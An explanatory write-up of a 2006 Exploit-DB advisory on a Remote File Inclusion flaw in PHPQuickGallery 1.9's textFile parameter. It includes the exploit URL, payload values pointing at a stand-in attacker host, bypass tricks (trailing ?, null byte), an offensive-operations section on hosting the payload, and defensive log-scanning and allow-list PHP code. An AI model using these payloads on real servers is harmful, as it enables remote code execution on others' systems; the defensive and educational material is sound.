PHPQuickGallery 1.9 Remote File Inclusion Explained

What this paper is
This paper, posted to milw0rm on 19 November 2006 and archived as Exploit-DB paper 2814, reports a Remote File Inclusion (RFI) vulnerability in PHPQuickGallery version 1.9. The author, Al7ejaz Hacker, gives a single exploit URL showing that the textFile parameter of gallery_top.inc.php can be pointed at a file on a server the attacker controls; PHP then fetches that file and executes its contents on the victim's web server.
Simple technical breakdown
The paper names only the file (gallery_top.inc.php) and the parameter (textFile); the mechanism is the standard one for RFI. The script takes the user-supplied textFile value and uses it, unvalidated, to build the argument of an include. If PHP is configured to allow remote includes, an attacker can supply the URL of a PHP file hosted on their own server; when gallery_top.inc.php includes that URL, PHP fetches the file and executes the attacker's code on the victim's server with the privileges of the web server process.
Complete code and payload walkthrough
The provided exploit is a URL. There is no separate code or payload presented in the original paper beyond the exploit URL itself.
Exploit URL:
http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker

- http://localhost/phpquickgallery/gallery_top.inc.php: the target script that contains the vulnerability.
- ?textFile=: the start of the query string; textFile is the vulnerable parameter.
- Attacker: a placeholder value for the textFile parameter. In a real attack this would be a URL pointing to a malicious PHP file on an attacker-controlled server (e.g., http://attacker.com/shell.txt).
The paper does not show the vulnerable code. Based on the description, gallery_top.inc.php likely contains something like the following (a hypothetical reconstruction, not code from the original paper):

<?php
// ... other code ...
$file_to_include = $_GET['textFile'];   // untrusted value straight from the query string
include($file_to_include . '.php');     // vulnerable line: no validation, no fixed base directory
// ... other code ...
?>

In this hypothetical code:
- $_GET['textFile'] retrieves the value passed in the textFile parameter from the URL.
- include($file_to_include . '.php'); attempts to include a file. If textFile is Attacker, it tries to include Attacker.php. If textFile is http://attacker.com/shell.txt, it attempts to include http://attacker.com/shell.txt.php; an attacker therefore normally appends a ? (http://attacker.com/shell.txt?) so that the .php suffix becomes part of the query string sent to their own server and is ignored. PHP's include fetches and executes a URL only when remote file access is enabled: allow_url_fopen in php.ini on the PHP versions current in 2006, and additionally allow_url_include (Off by default) from PHP 5.2.0 onwards.
Mapping:
- Exploit URL structure -> Practical purpose: triggers the inclusion of a remote file by manipulating the textFile parameter.
- gallery_top.inc.php -> Practical purpose: the vulnerable script that processes the textFile parameter.
- textFile parameter -> Practical purpose: the input vector for the Remote File Inclusion vulnerability.
- Value of textFile (e.g., Attacker or a remote URL) -> Practical purpose: the identifier of the file to be included, which the attacker controls.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No prior authentication to the web application is typically required for this type of vulnerability.
- Lab Preconditions:
- A vulnerable instance of PHPQuickGallery 1.9 deployed on a web server.
- A remote server controlled by the operator, capable of hosting a malicious PHP file.
- The target web server must have allow_url_fopen enabled in its php.ini configuration and, on PHP 5.2.0 or later, allow_url_include as well. This is a critical prerequisite.
- Tooling Assumptions:
- A web browser for testing and initial reconnaissance.
- A simple HTTP server (e.g., Python's http.server, netcat) to host the malicious payload.
- A text editor to create the malicious PHP payload.
- Execution Pitfalls:
- allow_url_fopen or allow_url_include disabled: if remote includes are disabled on the target server, RFI will not work. The same unvalidated parameter may still be usable for Local File Inclusion (LFI), i.e. including files that already exist on the server.
- Input sanitization/filtering: if the web application or server-side code performs strict validation or filtering on the textFile parameter (e.g., disallowing URLs or specific characters), the exploit might fail.
- File extension mismatch: the original exploit example uses the placeholder Attacker. If the vulnerable script appends .php (e.g., include($file_to_include . '.php');), the attacker appends a ? to the remote URL so that the suffix lands in the query string of the request to their own server (http://attacker.com/shell.txt?.php is served as shell.txt); on PHP versions before 5.3.4 a null byte (%00) also truncated the path. The payload is hosted with a .txt extension so that the attacker's own web server returns the PHP source as plain text instead of executing it; the target's PHP executes whatever the include returns, regardless of the extension.
- Network connectivity: the target server must be able to reach the attacker's hosting server. Egress firewalls or network segmentation could prevent this.
- Telemetry:
- Web server logs: look for requests to gallery_top.inc.php with unusual textFile values, especially those containing http:// or https:// (also in URL-encoded form, http%3A%2F%2F).
- Remote server logs: incoming HTTP requests to the attacker's hosting server from the target IP address.
- Application behavior: unexpected output, errors, or execution of commands on the target server.
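The log check described under Telemetry, as an added PHP example that is not part of the original paper. The access-log lines are constructed for illustration in Apache combined format, the client addresses and attacker host are placeholders, and the function names are assumptions; it needs PHP 7.1 or later.

```php
<?php
// Added example (not from the original paper): flag requests that hand a URL,
// a PHP stream wrapper, or a traversal string to gallery_top.inc.php?textFile=.
// Log lines are constructed for illustration (Apache combined format).

const ACCESS_LOG_SAMPLE = <<<'LOG'
203.0.113.5 - - [19/Nov/2006:10:01:02 +0000] "GET /phpquickgallery/gallery_top.inc.php?textFile=intro HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2006:10:01:09 +0000] "GET /phpquickgallery/gallery_top.inc.php?textFile=http://attacker.com/shell.txt? HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2006:10:01:15 +0000] "GET /phpquickgallery/gallery_top.inc.php?textFile=http%3A%2F%2Fattacker.com%2Fshell.txt%3F HTTP/1.1" 200 88 "-" "curl/7.15.5"
203.0.113.8 - - [19/Nov/2006:10:01:40 +0000] "GET /phpquickgallery/gallery_top.inc.php?textFile=../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Nov/2006:10:02:00 +0000] "GET /phpquickgallery/index.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
LOG;

// Returns ['client' => ip, 'textFile' => decoded value] for a request to
// gallery_top.inc.php that carries a textFile parameter, otherwise null.
function extract_text_file_request(string $line): ?array
{
    // Quoted request field: method, path, optional query string, protocol.
    if (!preg_match('#"(?:GET|POST) (\S+?)(?:\?(\S*))? HTTP/[\d.]+"#', $line, $m)) {
        return null;
    }
    if (basename($m[1]) !== 'gallery_top.inc.php') {
        return null;
    }
    parse_str($m[2] ?? '', $params);   // decodes %XX once, as PHP did for $_GET
    if (!isset($params['textFile']) || !is_string($params['textFile'])) {
        return null;
    }
    return ['client' => strtok($line, ' '), 'textFile' => $params['textFile']];
}

// Classifies a decoded textFile value. The extra decode catches double encoding.
function classify_text_file(string $value): string
{
    $v = rawurldecode($value);
    if (preg_match('#\A(?:https?|ftps?)://#i', $v)) {
        return 'rfi';       // remote URL that include() would fetch
    }
    if (preg_match('#\A(?:php|data|phar|expect|file)://#i', $v)) {
        return 'wrapper';   // PHP stream wrapper such as php://input
    }
    if (strpos($v, '..') !== false || strpos($v, "\0") !== false || ($v !== '' && $v[0] === '/')) {
        return 'lfi';       // traversal, null-byte truncation, or absolute path
    }
    return 'benign';
}

// Scans a whole log and returns only the suspicious requests.
function scan_access_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = extract_text_file_request($line);
        if ($req === null) {
            continue;
        }
        $verdict = classify_text_file($req['textFile']);
        if ($verdict !== 'benign') {
            $hits[] = $req + ['verdict' => $verdict];
        }
    }
    return $hits;
}

foreach (scan_access_log(ACCESS_LOG_SAMPLE) as $hit) {
    printf("%-12s %-8s textFile=%s\n",
        $hit['client'], $hit['verdict'], addcslashes($hit['textFile'], "\0..\37"));
}
```

Run it with php on the command line; the first and last sample lines are ignored as benign, and the URL-encoded request is decoded before classification, which is why a plain grep for "http://" alone is not enough. Requests from the same client that pair an RFI value with a trailing ? are a strong signal, since that is exactly what an attacker sends when the script appends .php.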
Where this was used and when
The advisory was posted to milw0rm on 19 November 2006. PHPQuickGallery was a small, simple web gallery script, and one-line RFI advisories of this kind were common in the mid-2000s, when allow_url_fopen was typically on, allow_url_include had only just been introduced in PHP 5.2.0, and web application security practices were less mature. The exploit applies to any server running PHPQuickGallery 1.9 on a PHP configuration that permits remote includes.
Defensive lessons for modern teams
- Input Validation is Paramount: never trust user input. Always validate all external data before using it in file operations or any other sensitive context.
- Disable allow_url_include (and allow_url_fopen where nothing needs it): allow_url_include has been Off by default since PHP 5.2.0 and is deprecated as of PHP 7.4; allow_url_fopen is still On by default and is used by some code that reads remote resources, so review before turning it off. Neither should be On for an application that does not require it.
- Use Allow-listing: instead of trying to block bad inputs, define a strict list of allowed inputs (e.g., a list of known, safe template files) and reject everything else.
- Secure File Inclusion Practices: if file inclusion is necessary, call include() or require() with hard-coded paths or a path selected from a fixed set, never a value built directly from user input; resolve the final path and confirm it stays under the intended directory.
- Web Application Firewalls (WAFs): while not a silver bullet, WAFs can help detect and block common RFI patterns. However, attackers can often bypass simple WAF rules, for example with URL encoding.
- Regular Patching and Updates: keep all web applications and their dependencies updated to the latest secure versions.
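The hardening points above, as an added PHP example that is not part of the original paper or of PHPQuickGallery's code. The vulnerable function reproduces the hypothetical include() reconstructed earlier; the text/ directory, the allow list, and the function names are assumptions, and the code needs PHP 7.1 or later.

```php
<?php
// Added example (not PHPQuickGallery's code): the reconstructed vulnerable
// include() beside an allow-listed replacement. Requires PHP 7.1+ (nullable types).

// VULNERABLE (hypothetical reconstruction): whatever arrives in ?textFile=
// is handed straight to include(), so a URL or a traversal string is included.
function include_text_file_vulnerable(string $textFile): void
{
    include($textFile . '.php');
}

// HARDENED: user input selects one entry from a fixed list under a fixed directory.
const TEXT_DIR = __DIR__ . '/text';                        // assumed text-file directory
const ALLOWED_TEXT_FILES = ['intro', 'about', 'credits'];  // assumed allow list

// Returns the absolute path to include, or null if the name is not acceptable
// or the file does not exist under TEXT_DIR.
function resolve_text_file(string $textFile): ?string
{
    // 1. Shape check: a short identifier only. This alone rejects "http://",
    //    "../", "php://", a null byte, and anything URL-encoded.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $textFile)) {
        return null;
    }
    // 2. Allow list, compared strictly.
    if (!in_array($textFile, ALLOWED_TEXT_FILES, true)) {
        return null;
    }
    // 3. Resolve the final path and confirm it is still inside TEXT_DIR
    //    (defence in depth against symlinks or a later edit of the list).
    $base = realpath(TEXT_DIR);
    $path = realpath(TEXT_DIR . '/' . $textFile . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function include_text_file_hardened(string $textFile): void
{
    $path = resolve_text_file($textFile);
    if ($path === null) {
        http_response_code(400);
        exit('invalid textFile');
    }
    include $path;
}

// Probe values (constructed for illustration); each is rejected at step 1 or 2.
$probes = ['http://attacker.com/shell.txt?', '../../../etc/passwd', "intro\0", 'php://input'];
foreach ($probes as $probe) {
    var_dump(resolve_text_file($probe));
}
```

Every probe is rejected by resolve_text_file before any filesystem access happens; a legitimate name such as intro is accepted only once text/intro.php actually exists under the configured directory. Pair the code change with allow_url_include = Off (and allow_url_fopen = Off if nothing needs it) in php.ini, so that a future regression in the code cannot be turned back into remote code execution.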
ASCII visual

Attacker's browser            Target web server                  Attacker's server
                              (PHPQuickGallery 1.9,              (hosts shell.txt)
                               gallery_top.inc.php)
       |                               |                                 |
       | GET gallery_top.inc.php?      |                                 |
       |   textFile=http://attacker.com/shell.txt?                       |
       |------------------------------>|                                 |
       |                               | include() fetches the URL:      |
       |                               | GET /shell.txt?.php             |
       |                               |-------------------------------->|
       |                               |<--------------------------------|
       |                               | PHP source of shell.txt         |
       |                               |                                 |
       |                               | PHP executes the fetched code   |
       |<------------------------------|  => compromised host            |
       | command output / response     |                                 |

Source references
- Paper URL: https://www.exploit-db.com/papers/2814
- Raw Exploit URL: https://www.exploit-db.com/raw/2814
- Exploit-DB Entry: PAPER ID: 2814
Original Exploit-DB Content (Verbatim)
============================================================================
+ =
+ PhpQuickGallery Remote File Include
+ =
+
+===========================================================================
+
+
+
+Script: phpquickgallery
+
+Risk: Dangerous
+
+Type: Remote File Include
+
+File Infected : gallery_top.inc.php
+
+Credit By: Al7ejaz Hacker
+
+E-mail: saudi@hotmail.fr
+============================================================================
+
+
++++++++++++
+Exploit : +
++++++++++++
+
+http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker
+
+
+
+Discovered By Al7ejaz Hacker
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2006-11-19]